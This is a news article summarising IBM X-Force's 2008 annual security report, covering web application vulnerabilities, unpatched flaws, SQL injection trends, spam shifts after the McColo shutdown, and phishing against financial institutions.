Companies their own worst enemy says IBM X-Force report

The problem, says the X-Force annual report, is that company Internet resources are often being used against themselves, creating a new twist to the `enemy within,' Infosecurity notes.

The report claims to identify two main trends in IT security in 2008:

Firstly, Web sites have become the weak point when it comes to corporate IT security. Hackers, says IBM, are increasingly focusing on attacking Web applications in order to infect end-user machines.

On top of this, companies are using off-the-shelf applications that have multiple vulnerabilities or, perhaps worse, they are developing custom applications that can host a number of unknown vulnerabilities that cannot be patched using conventional IT resources.

During 2008, IBM says that more than half of all vulnerabilities disclosed were related to Web applications, and of these, more than 74 per cent had no patch available.

As a result of this trend, the report notes that automated SQL injection vulnerabilities - a development that emerged in early 2008 - have increased in number to the point where they represent a major threat to companies.

The second major trend that IBM X-Force reveals in its annual report is that, although hackers are focusing on Web browser clients and ActiveX controls as an avenue for attacks, they are also looking to relatively new IP technologies such as Flash applets as a way past company IT security safeguards.

During Q4 of 2008, IBM X-Force says it logged a 50 per cent plus increase in the number of malicious URLs hosting exploits than its researchers saw during the whole of 2007.

Other key findings of the report were:
2008 was the busiest year for discovering vulnerabilities with a 13.5 per cent increase over 2007.

At the end of 2008, 53 per cent of all vulnerabilities disclosed during the year had no vendor-supplied patches. On top of this, 46 per cent of vulnerabilities dating from 2006 and 44 per cent dating from 2007 were still left with no available patch at the end of 2008.

The McColo server shutdown late in the year had the most impact on spam activity in 2008, not only affecting quantity but also affecting the type of spam sent and countries that sent the unwanted email.

China emerged as top spam sender directly after the McColo shutdown, but was replaced by Brazil by the end of the year. For a number of before the McColo server shutdown, the US had claimed the dubious honour of holding number one spot in the spam charts.

Phishers continue to attack financial institutions. Nearly 90 per cent of phishing attacks were targeted to financial institutions, with the majority targeting those in North America.

What’s hot on Infosecurity Magazine?